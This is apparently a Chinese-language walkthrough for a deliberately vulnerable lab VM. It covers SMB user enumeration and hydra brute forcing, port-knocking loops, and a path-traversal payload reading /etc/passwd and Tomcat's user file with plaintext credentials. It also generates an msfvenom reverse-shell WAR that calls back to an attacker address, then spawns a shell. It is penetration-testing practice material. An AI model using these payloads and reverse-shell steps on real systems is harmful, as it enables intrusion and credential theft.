仅供个人娱乐
靶机信息
下载地址:https://drive.google.com/uc?id=1YzsW1lCKjo_WEr6Pk511DXQBFyMMR14y&export=download
一、主机探测
二、信息收集
22/tcp filtered ssh
53/tcpopendomain
80/tcp filtered http
110/tcpopenpop3?
139/tcpopennetbios-ssn Samba smbd3.X-4.X(workgroup:WORKGROUP)
143/tcpopenimap Dovecot imapd
445/tcpopennetbios-ssn Samba smbd4.3.11-Ubuntu(workgroup:WORKGROUP)
993/tcpopenssl/imap Dovecot imapd995/tcpopenssl/pop3s?
8080/tcpopenhttp Apache Tomcat/Coyote JSP engine1.1
8080tomcat页面,/manager/登录不了
三、漏洞查找和利用
1.Samba漏洞攻击
Samba服务查看用户名.
enum4linux -U 192.168.174.130
用户名为:qiu 或者 pleadformercy
尝试远程挂载
mkdir /mnt/file
mount -tcifs 192.168.174.130:/qiu /mnt/file
hydra -L 1.txt -P 2.txt smb://192.168.174.130 -s 139
登录账户信息
smbclient //192.168.174.130/qiu -U qiu
端口启动守护进程的防火墙端口开放的命令配置.
#!/bin/bash
for PORT in 159 27391 4;do nmap -Pn 192.168.174.130 -p $PORT;
done
#!/bin/bash
for PORT in 17301 28504 9999;do nmap -Pn 192.168.174.130 -p $PORT;
done
打开80端口
其PoC为:
http://192.168.174.130/nomercy//windows/code.php?file=../../../../../../etc/passwd
8080端口中 ,apache的配置信息在/etc/tomcat7/tomcat-users.xml
http://192.168.174.130/nomercy//windows/code.php?file=../../../../../../etc/tomcat7/tomcat-users.xml
获取账户密码
<? <user username="thisisasuperduperlonguser" password="heartbreakisinevitable" roles="admin-gui,manager-gui"/><? <user username="fluffy" password="freakishfluffybunny" roles="none"/>
msfvenom来生成反弹war包
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.174.128 LPORT=4444 -f war -o shell1.war
通过7z命令查看war包的内容
7z l shell1.war
生成的是wviikccgyjggh.jsp
访问http://192.168.174.130:8080/shell1/wviikccgyjggh.jsp
python -c 'import pty;pty.spawn("/bin/bash")'
信息收集
切换账户登录
<? <user username="fluffy" password="freakishfluffybunny" roles="none"/>
